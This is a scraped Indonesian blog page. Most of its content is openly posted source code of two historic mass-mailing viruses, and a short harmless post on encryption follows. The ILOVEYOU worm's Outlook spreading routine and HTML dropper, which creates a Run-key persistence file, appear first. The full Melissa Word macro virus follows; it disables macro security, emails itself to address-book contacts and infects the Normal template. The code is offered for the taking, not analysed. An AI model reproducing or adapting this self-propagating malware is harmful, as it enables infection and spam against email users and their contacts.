regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML<?-?TITLE><META <br />NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ <br />"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? <br />@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ <br />"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is <br />good...@-@>"&vbcrlf& _ <br />"<?-?HEAD><BODY <br />ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# <br />-#,#-#main#-#)@-@ "&vbcrlf& _ <br />"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# <br />-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ <br />"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read <br />this HTML file<BR>- Please press #-#YES#-# button to Enable <br />ActiveX<?-?p>"&vbcrlf& _ <br />"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ <br />BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> <br />"&vbcrlf& _ <br />"<?-?BODY><?-?HTML>"&vbcrlf& _ <br />"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ <br />"<!--?-??-?"&vbcrlf& _ <br />"if (window.screen){var wi=screen.availWidth;var <br />hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ <br />"?-??-?-->"&vbcrlf& _ <br />"<?-?SCRIPT>"&vbcrlf& _ <br />"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ <br />"<!--"&vbcrlf& _ <br />"on error resume next"&vbcrlf& _ <br />"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ <br />"aw=1"&vbcrlf& _ <br />"code=" <br />dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ <br />"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ <br />"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ <br />"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ <br />"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ <br />"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ <br />"wri.write code4"&vbcrlf& _ <br />"wri.close"&vbcrlf& _ <br />"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ <br />"if (err.number=424) then"&vbcrlf& _ <br />"aw=0"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"if (aw=1) then"&vbcrlf& _ <br />"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ <br />"window.close"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ <br />"regedit.RegWrite <br />@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru <br />n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ <br />"?-??-?-->"&vbcrlf& _ <br />"<?-?SCRIPT>" <br />dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") <br />dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") <br />dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") <br />dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") <br />dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") <br />dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") <br />dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") <br />dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") <br />set fso=CreateObject("Scripting.FileSystemObject") <br />set c=fso.OpenTextFile(WScript.ScriptFullName,1) <br />lines=Split(c.ReadAll,vbcrlf) <br />l1=ubound(lines) <br />for n=0 to ubound(lines) <br />lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) <br />lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) <br />lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) <br />if (l1=n) then <br />lines(n)=chr(34)+lines(n)+chr(34) <br />else <br />lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" <br />end if <br />next <br />set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") <br />b.close <br />set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) <br />d.write dt5 <br />d.write join(lines,vbcrlf) <br />d.write vbcrlf <br />d.write dt6 <br />d.close <br />end sub <br /> <div style='clear: both;'></div> </div> <div class='clear'></div> <div class='info'> <span class='category'> </span> <span class='bubble'> <a class='comment-link' href='https://oret2-corat-coret.blogspot.com/2009/12/source-code-virus_25.html#comment-form' onclick=''>0 komentar</a> </span> <span class='post-backlinks post-comment-link'> | </span> <span class='post-icons'> <span class='item-control '> <a href='https://www.blogger.com/post-edit.g?blogID=5394344077739071592&postID=2564588818318783399&from=pencil' title='Edit Entri'> <img alt='edit post' class='icon-action' src='http://www.blogger.com/img/icon18_edit_allbkg.gif'/> </a> </span> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='edit'></div> </div> <div class='post hentry' id='post'> <div class='post_title'> <a name='8549811790459664218'></a> <a href='https://oret2-corat-coret.blogspot.com/2009/12/source-code-virus.html'>Source Code Virus</a> <div class='post_author'> <span class='fn'>kang.coet</span> </div> </div> <div class='post_date'> <script type='text/javascript'> var timestamp = "05.43"; if (timestamp != '') { var timesplit = timestamp.split(","); var date_yyyy = timesplit[2]; var timesplit = timesplit[1].split(" "); var date_dd = timesplit[2]; var date_mmm = timesplit[1].substring(0, 3); } </script> <div class='post_date_d'><script type='text/javascript'>document.write(date_dd);</script></div> <div class='post_date_m'><script type='text/javascript'>document.write(date_mmm); document.write(date_yyyy)</script></div> </div> <div class='entry clear'> <span style="font-weight:bold;">Virus Mellisa </span><br /><br /><br />Private Sub AutoOpen() <br />On Error Resume Next <br />p$ = "clone" <br />If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then <br />CommandBars("Macro").Controls("Security...").Enabled = False <br />System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& <br />Else <br />p$ = "clone" <br />CommandBars("Tools").Controls("Macro").Enabled = False <br />Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) <br />End If <br />Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice <br />Set UngaDasOutlook = CreateObject("Outlook.Application") <br />Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") <br />If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then <br />If UngaDasOutlook = "Outlook" Then <br />DasMapiName.Logon "profile", "password" <br />For y = 1 To DasMapiName.AddressLists.Count <br />Set AddyBook = DasMapiName.AddressLists(y) <br />x = 1 <br />Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) <br />For oo = 1 To AddyBook.AddressEntries.Count <br />Peep = AddyBook.AddressEntries(x) <br />BreakUmOffASlice.Recipients.Add Peep <br />x = x + 1 <br />If x > 50 Then oo = AddyBook.AddressEntries.Count <br />Next oo <br />BreakUmOffASlice.Subject = "Important Message From " & Application.UserName <br />BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" <br />BreakUmOffASlice.Attachments.Add ActiveDocument.FullName <br />BreakUmOffASlice.Send <br />Peep = "" <br />Next y <br />DasMapiName.Logoff <br />End If <br />p$ = "clone" <br />System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" <br />End If <br />Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) <br />Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) <br />NTCL = NTI1.CodeModule.CountOfLines <br />ADCL = ADI1.CodeModule.CountOfLines <br />BGN = 2 <br />If ADI1.Name <> "Melissa" Then <br />If ADCL > 0 Then _ <br />ADI1.CodeModule.DeleteLines 1, ADCL <br />Set ToInfect = ADI1 <br />ADI1.Name = "Melissa" <br />DoAD = True <br />End If <br />If NTI1.Name <> "Melissa" Then <br />If NTCL > 0 Then _ <br />NTI1.CodeModule.DeleteLines 1, NTCL <br />Set ToInfect = NTI1 <br />NTI1.Name = "Melissa" <br />DoNT = True <br />End If <br />If DoNT <> True And DoAD <> True Then GoTo CYA <br />If DoNT = True Then <br />Do While ADI1.CodeModule.Lines(1, 1) = "" <br />ADI1.CodeModule.DeleteLines 1 <br />Loop <br />ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") <br />Do While ADI1.CodeModule.Lines(BGN, 1) <> "" <br />ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) <br />BGN = BGN + 1 <br />Loop <br />End If <br />p$ = "clone" <br />If DoAD = True Then <br />Do While NTI1.CodeModule.Lines(1, 1) = "" <br />NTI1.CodeModule.DeleteLines 1 <br />Loop <br />ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") <br />Do While NTI1.CodeModule.Lines(BGN, 1) <> "" <br />ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) <br />BGN = BGN + 1 <br />Loop <br />End If <br />CYA: <br />If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then <br />ActiveDocument.SaveAs FileName:=ActiveDocument.FullName <br />ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then <br />ActiveDocument.Saved = True: End If <br />'WORD/Melissa written by Kwyjibo <br />'Clone written by Duke/SMF <br />'Works in both Word 2000 and Word 97 <br />'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! <br />'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! <br />If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." <br />End Sub <div style='clear: both;'></div> </div> <div class='clear'></div> <div class='info'> <span class='category'> </span> <span class='bubble'> <a class='comment-link' href='https://oret2-corat-coret.blogspot.com/2009/12/source-code-virus.html#comment-form' onclick=''>0 komentar</a> </span> <span class='post-backlinks post-comment-link'> | </span> <span class='post-icons'> <span class='item-control '> <a href='https://www.blogger.com/post-edit.g?blogID=5394344077739071592&postID=8549811790459664218&from=pencil' title='Edit Entri'> <img alt='edit post' class='icon-action' src='http://www.blogger.com/img/icon18_edit_allbkg.gif'/> </a> </span> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='edit'></div> </div> <div class='post hentry' id='post'> <div class='post_title'> <a name='2603189649810660479'></a> <a href='https://oret2-corat-coret.blogspot.com/2009/12/enkripsi-untuk-keamanan-data-pada.html'>Enkripsi Untuk Keamanan Data Pada Jaringan</a> <div class='post_author'> <span class='fn'>kang.coet</span> </div> </div> <div class='post_date'> <script type='text/javascript'> var timestamp = "05.41"; if (timestamp != '') { var timesplit = timestamp.split(","); var date_yyyy = timesplit[2]; var timesplit = timesplit[1].split(" "); var date_dd = timesplit[2]; var date_mmm = timesplit[1].substring(0, 3); } </script> <div class='post_date_d'><script type='text/javascript'>document.write(date_dd);</script></div> <div class='post_date_m'><script type='text/javascript'>document.write(date_mmm); document.write(date_yyyy)</script></div> </div> <div class='entry clear'> Oleh : Muhammad Mursodo<br /><br />Salah satu hal yang penting dalam komunikasi menggunakan computer untuk menjamin kerahasian data adalah enkripsi. Enkripsi dalah sebuah proses yang melakukan perubahan sebuah kode dari yang bisa dimengerti menjadi sebuah kode yang tidak bisa dimengerti (tidak terbaca). Enkripsi dapat diartikan sebagai kode atau chiper. Sebuah sistem pengkodean menggunakan suatu table atau kamus yang telah didefinisikan untuk mengganti kata dari informasi atau yang merupakan bagian dari informasi yang dikirim. Sebuah chiper menggunakan suatu algoritma yang dapat mengkodekan semua aliran data (stream) bit dari sebuah pesan menjadi cryptogram yang tidak dimengerti (unitelligible). Karena teknik cipher merupakan suatu sistem yang telah siap untuk di automasi, maka teknik ini digunakan dalam sistem keamanan komputer dan network.<br /><br />Pada bagian selanjutnya kita akan membahas berbagai macam teknik enkripsi yang biasa digunakan dalam sistem sekuriti dari sistem komputer dan network.<br /><br />A. Enkripsi Konvensional.<br /><br />Proses enkripsi ini dapat digambarkan sebagai berikut :<br /><br />Plain teks -> Algoritma Enkripsi -> Cipher teks ->Algoritma Dekrispsi -> Plain teks<br />User A | | User B<br />|----------------------Kunci (Key) --------------------|<br />Gambar 1<br /><br />Informasi asal yang dapat di mengerti di simbolkan oleh Plain teks, yang kemudian oleh algoritma Enkripsi diterjemahkan menjadi informasi yang tidak dapat untuk dimengerti yang disimbolkan dengan cipher teks. Proses enkripsi terdiri dari dua yaitu algoritma dan kunci. Kunci biasanya merupakan suatu string bit yang pendek yang mengontrol algoritma. Algoritma enkripsi akan menghasilkan hasil yang berbeda tergantung pada kunci yang digunakan. Mengubah kunci dari enkripsi akan mengubah output dari algortima enkripsi.<br /><br />Sekali cipher teks telah dihasilkan, kemudian ditransmisikan. Pada bagian penerima selanjutnya cipher teks yang diterima diubah kembali ke plain teks dengan algoritma dan dan kunci yang sama.<br /><br />Keamanan dari enkripsi konvensional bergantung pada beberapa faktor. Pertama algoritma enkripsi harus cukup kuat sehingga menjadikan sangat sulit untuk mendekripsi cipher teks dengan dasar cipher teks tersebut. Lebih jauh dari itu keamanan dari algoritma enkripsi konvensional bergantung pada kerahasian dari kuncinya bukan algoritmanya. Yaitu dengan asumsi bahwa adalah sangat tidak praktis untuk mendekripsikan informasi dengan dasar cipher teks dan pengetahuan tentang algoritma diskripsi / enkripsi. Atau dengan kata lain, kita tidak perlu menjaga kerahasiaan dari algoritma tetapi cukup dengan kerahasiaan kuncinya.<br /><br /> Manfaat dari konvensional enkripsi algoritma adalah kemudahan dalam penggunaan secara luas. Dengan kenyataan bahwa algoritma ini tidak perlu dijaga kerahasiaannya dengan maksud bahwa pembuat dapat dan mampu membuat suatu implementasi dalam bentuk chip dengan harga yang murah. Chips ini dapat tersedia secara luas dan disediakan pula untuk beberapa jenis produk. Dengan penggunaan dari enkripsi konvensional, prinsip keamanan adalah menjadi menjaga keamanan dari kunci.<br /><br />Model enkripsi yang digunakan secara luas adalah model yang didasarkan pada data encrytion standard (DES), yang diambil oleh Biro standart nasional US pada tahun 1977. Untuk DES data di enkripsi dalam 64 bit block dengan menggunakan 56 bit kunci. Dengan menggunakan kunci ini, 64 data input diubah dengan suatu urutan dari metode menjadi 64 bit output. Proses yang yang sama dengan kunci yang sama digunakan untuk mengubah kembali enkripsi.<br /><br />B. Enkripsi Public-Key<br /><br />Salah satu yang menjadi kesulitan utama dari enkripsi konvensional adalah perlunya untuk mendistribusikan kunci yang digunakan dalam keadaan aman. Sebuah cara yang tepat telah diketemukan untuk mengatasi kelemahan ini dengan suatu model enkripsi yang secara mengejutkan tidak memerlukan sebuah kunci untuk didistribusikan. Metode ini dikenal dengan nama enkripsi public-key dan pertama kali diperkenalkan pada tahun 1976.<br /><br />Plain teks -> Algoritma Enkripsi -> Cipher teks -> Algoritma Dekrispsi -> Plain teks<br />User A | | User B<br /> Private Key B ----|<br />|----------------------Kunci (Key) --------------------|<br />Gambar 2<br /><br />Algoritma tersebut seperti yang digambarkan pada gambar diatas. Untuk enkripsi konvensional, kunci yang digunakan pada prosen enkripsi dan dekripsi adalah sama. Tetapi ini bukanlah kondisi sesungguhnya yang diperlukan. Namun adalah dimungkinkan untuk membangun suatu algoritma yang menggunakan satu kunci untuk enkripsi dan pasangannya, kunci yang berbeda, untuk dekripsi. Lebih jauh lagi adalah mungkin untuk menciptakan suatu algoritma yang mana pengetahuan tentang algoritma enkripsi ditambah kunci enkripsi tidak cukup untuk menentukan kunci dekrispi. Sehingga teknik berikut ini akan dapat dilakukan :<br /><br /> 1. Masing - masing dari sistem dalam network akan menciptakan sepasang kunci yang digunakan untuk enkripsi dan dekripsi dari informasi yang diterima.<br /> 2. Masing - masing dari sistem akan menerbitkan kunci enkripsinya ( public key ) dengan memasang dalam register umum atau file, sedang pasangannya tetap dijaga sebagai kunci pribadi ( private key ).<br /> 3. Jika A ingin mengisim pesan kepada B, maka A akan mengenkripsi pesannya dengan kunci publik dari B.<br /> 4. Ketika B menerima pesan dari A maka B akan menggunakan kunci privatenya untuk mendeskripsi pesan dari A.<br /><br />Seperti yang kita lihat, public-key memecahkan masalah pendistribusian karena tidak diperlukan suatu kunci untuk didistribusikan. Semua partisipan mempunyai akses ke kunci publik ( public key ) dan kunci pribadi dihasilkan secara lokal oleh setiap partisipan sehingga tidak perlu untuk didistribusikan. Selama sistem mengontrol masing - masing private key dengan baik maka komunikasi menjadi komunikasi yang aman. Setiap sistem mengubah private key pasangannya public key akan menggantikan public key yang lama. Yang menjadi kelemahan dari metode enkripsi publik key adalah jika dibandingkan dengan metode enkripsi konvensional algoritma enkripsi ini mempunyai algoritma yang lebih komplek. Sehingga untuk perbandingan ukuran dan harga dari hardware, metode publik key akan menghasilkan performance yang lebih rendah. Tabel berikut ini akan memperlihatkan berbagai aspek penting dari enkripsi konvensional dan public key.<br /><br />Enkripsi Konvensional<br />Yang dibutuhkan untuk bekerja :<br /><br /> 1. Algoritma yang sama dengan kunci yang sama dapat digunakan untuk proses dekripsi - enkripsi.<br /> 2. Pengirim dan penerima harus membagi algoritma dan kunci yang sama.<br /><br />Yang dibutuhkan untuk keamanan :<br /><br /> 1. Kunci harus dirahasiakan.<br /> 2. Adalah tidak mungkin atau sangat tidak praktis untuk menerjemahkan informasi yang telah dienkripsi.<br /> 3. Pengetahuan tentang algoritma dan sample dari kata yang terenkripsi tidak mencukupi untu menentukan kunc.<br /><br />Enkripsi Public Key<br />Yang dibutuhkan untuk bekerja :<br /><br /> 1. Algoritma yang digunakan untuk enkripsi dan dekripsi dengan sepasang kunci, satu untuk enkripsi satu untuk dekripsi.<br /> 2. Pengirim dan penerima harus mempunyai sepasang kunci yang cocok.<br /><br />Yang dibutuhkan untuk keamanan :<br /><br /> 1. Salah satu dari kunci harus dirahasiakan.<br /> 2. Adalah tidak mungkin atau sangat tidak praktis untuk menerjemahkan informasi yang telah dienkripsi.<br /> 3. Pengetahuan tentang algoritma dan sample dari kata yang terenkripsi tidak mencukupi untu menentukan kunci. <div style='clear: both;'></div> </div> <div class='clear'></div> <div class='info'> <span class='category'> </span> <span class='bubble'> <a class='comment-link' href='https://oret2-corat-coret.blogspot.com/2009/12/enkripsi-untuk-keamanan-data-pada.html#comment-form' onclick=''>0 komentar</a> </span> <span class='post-backlinks post-comment-link'> | </span> <span class='post-icons'> <span class='item-control '> <a href='https://www.blogger.com/post-edit.g?blogID=5394344077739071592&postID=2603189649810660479&from=pencil' title='Edit Entri'> <img alt='edit post' class='icon-action' src='http://www.blogger.com/img/icon18_edit_allbkg.gif'/> </a> </span> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> </div> <div class='edit'></div> </div> <!--Can't find substitution for tag [adEnd]--> </div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-newer-link'> <a class='blog-pager-newer-link' href='https://oret2-corat-coret.blogspot.com/search?updated-max=2010-01-26T06:25:00-08:00&max-results=7&reverse-paginate=true' id='Blog1_blog-pager-newer-link' title='Postingan Lebih Baru'>Postingan Lebih Baru</a> </span> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='https://oret2-corat-coret.blogspot.com/search?updated-max=2009-12-25T05:41:00-08:00&max-results=7' id='Blog1_blog-pager-older-link' title='Postingan Lama'>Postingan Lama</a> </span> <a class='home-link' href='https://oret2-corat-coret.blogspot.com/'>Beranda</a> </div> </div><div class='widget HTML' data-version='1' id='HTML1'> <h2 class='title'>ngobrool yuuk</h2> <div class='widget-content'> <!-- Begin ShoutMix - http://www.shoutmix.com --><iframe scrolling="auto" width="" frameborder="0" src="http://www5.shoutmix.com/?kangco3t" height="" title="kangco3t"><a href="http://www5.shoutmix.com/?kangco3t">View shoutbox</a></iframe><br/><a href="http://www.shoutmix.com" title="Get your own free shoutbox chat widget at ShoutMix!">ShoutMix chat widget</a><br/><!-- End ShoutMix --> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML5'> <h2 class='title'>advertiser</h2> <div class='widget-content'> <script src="http://kumpulblogger.com/scahor.php?b=93102&onlytitle=1" type="text/javascript"></script> </div> <div class='clear'></div> </div></div> <!-- Navigation --> <div class='pagination'> <div class='alignleft'></div> <div class='alignright'></div> </div> <!-- /Navigation --> <div class='clear'></div> </div> <!-- /Content --> <!-- Sidebar --> <div id='sidebar1'> <ul><li> <div class='sidebar11 section' id='sidebar11'><div class='widget Image' data-version='1' id='Image1'> <h2>Stmik Amikom Yogyakarta</h2> <div class='widget-content'> <a href='http://www.amikom.ac.id/'> <img alt='Stmik Amikom Yogyakarta' height='49' id='Image1_img' src='//3.bp.blogspot.com/_5cmmDUPX2Is/S6PR6CxJXcI/AAAAAAAAACs/OWWkK6_fkyw/S170/amikom.png' width='170'/> </a> <br/> <span class='caption'>AMIKOM</span> </div> <div class='clear'></div> </div><div class='widget BlogSearch' data-version='1' id='BlogSearch1'> <h2 class='title'>search</h2> <div class='widget-content'> <div id='BlogSearch1_form'> <form action='https://oret2-corat-coret.blogspot.com/search' class='gsc-search-box' target='_top'> <table cellpadding='0' cellspacing='0' class='gsc-search-box'> <tbody> <tr> <td class='gsc-input'> <input autocomplete='off' class='gsc-input' name='q' size='10' title='search' type='text' value=''/> </td> <td class='gsc-search-button'> <input class='gsc-search-button' title='search' type='submit' value='Telusuri'/> </td> </tr> </tbody> </table> </form> </div> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML4'> <h2 class='title'>iklan</h2> <div class='widget-content'> <!-- Begin: http://adsensecamp.com/ --> <script src="http://adsensecamp.com/show/?id=ZZ7TVrgNVJ4%3D&cid=1mKE6FR8OXo%3D&chan=JioSQrNiLh8%3D&type=4&title=3D81EE&text=000000&background=FFFFFF&border=000000&url=2BA94F" type="text/javascript"> </script> <!-- End: http://adsensecamp.com/ --> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML8'> <div class='widget-content'> <script src="http://kumpulblogger.com/dam.php?b=93102" type="text/javascript"> </script> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML3'> <div class='widget-content'> <script src="http://widgets.amung.us/tab.js" type="text/javascript"></script><script type="text/javascript">WAU_tab('18euos2hkiow', 'right-upper')</script> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML6'> <div class='widget-content'> <a href="http://www.kutukutubuku.com/kumpulblogger/index.html" target="_new"><img src="http://www.kutukutubuku.com/kumpulblogger/kumpulbloggerad.jpg"/></a><br/>Masukkan Code ini <strong>K1-2BBACE-5</strong><br/>untuk berbelanja di KutuKutuBuku.com </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML7'> <div class='widget-content'> <a href="http://kumpulblogger.com/smart_index.php?skbid=117772" target="_new"><img src="http://kumpulblogger.com/banner_smart.jpg" title="Produk SMART"/></a><br/>Produk SMART Telecom </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML10'> <div class='widget-content'> <a href="http://s04.flagcounter.com/more/I0tl"><img border="0" alt="free counters" src="http://s04.flagcounter.com/count/I0tl/bg=FFFFFF/txt=000000/border=CCCCCC/columns=2/maxflags=20/viewers=3/labels=0/pageviews=1/"/></a> </div> <div class='clear'></div> </div></div> </li></ul> </div> <div id='sidebar2'> <ul><li> <div class='sidebar22 section' id='sidebar22'><div class='widget HTML' data-version='1' id='HTML2'> <h2 class='title'>pengunjung</h2> <div class='widget-content'> <table border="0" width="133" cellspacing="0" cellpadding="3"><tr><td align="center"><a href="http://www.elogicwebsolutions.com" target="_blank"><img border="0" alt="" src="http://www.elogicwebsolutions.com/cgi-bin/cntimg.pl?c=10564-4973"/></a></td></tr><tr><td align="center"><font style="font-family:Geneva,Arial,Helvetica,sans-serif;font-size:9px;color:#000000">Provided by <a style="font-family: Geneva,Arial,Helvetica,sans-serif;font-size:9px;color:#000000" href="http://www.elogicwebsolutions.com" target="_blank" title="elogicwebsolutions.com">elogicwebsolutions.com</a> web development company.</font></td></tr></table> </div> <div class='clear'></div> </div><div class='widget Profile' data-version='1' id='Profile1'> <h2>siapa saya??</h2> <div class='widget-content'> <dl class='profile-datablock'> <dt class='profile-data'> <a class='profile-name-link g-profile' href='https://www.blogger.com/profile/10117251753161097043' rel='author' style='background-image: url(//www.blogger.com/img/logo-16.png);'> kang.coet </a> </dt> <dd class='profile-textblock'>seekor mahasiswa bodoh dan pemalas yg menganggap dirinya *sensor*.. hmmmm..</dd> </dl> <a class='profile-link' href='https://www.blogger.com/profile/10117251753161097043' rel='author'>Lihat profil lengkapku</a> <div class='clear'></div> </div> </div><div class='widget BlogArchive' data-version='1' id='BlogArchive1'> <h2>coretan</h2> <div class='widget-content'> <div id='ArchiveList'> <div id='BlogArchive1_ArchiveList'> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://oret2-corat-coret.blogspot.com/2010/'> 2010 </a> <span class='post-count' dir='ltr'>(27)</span> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://oret2-corat-coret.blogspot.com/2010/03/'> Maret </a> <span class='post-count' dir='ltr'>(10)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://oret2-corat-coret.blogspot.com/2010/02/'> Februari </a> <span class='post-count' dir='ltr'>(4)</span> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <a class='toggle' href='javascript:void(0)'> <span class='zippy'> ►  </span> </a> <a class='post-count-link' href='https://oret2-corat-coret.blogspot.com/2010/01/'> Januari </a> <span class='post-count' dir='ltr'>(13)</span> </li> </ul> </li> </ul> <ul class='hierarchy'> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'> ▼  </span> </a> <a class='post-count-link' href='https://oret2-corat-coret.blogspot.com/2009/'> 2009 </a> <span class='post-count' dir='ltr'>(51)</span> <ul class='hierarchy'> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'> ▼  </span> </a> <a class='post-count-link' href='https://oret2-corat-coret.blogspot.com/2009/12/'> Desember </a> <span class='post-count' dir='ltr'>(51)</span> <ul class='posts'> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/mengatasi-masalah-pada-ram.html'>Mengatasi masalah pada RAM</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/mencurangi-billing-warnet-dengan-zhider.html'>Mencurangi Billing Warnet Dengan Zhider</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/mengambil-objek-animasi-flash-di.html'>Mengambil Objek Animasi Flash di Website</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/tip-dan-trik-mempopulerkan-website-di.html'>Tip dan Trik Mempopulerkan Website di Search Engin...</a></li> <li><a href='https://oret2-corat-coret.blogspot.com/2009/12/tidak-bisa-klik-kanan.html'>Tidak Bisa Klik Kanan?</a></li> <li><a 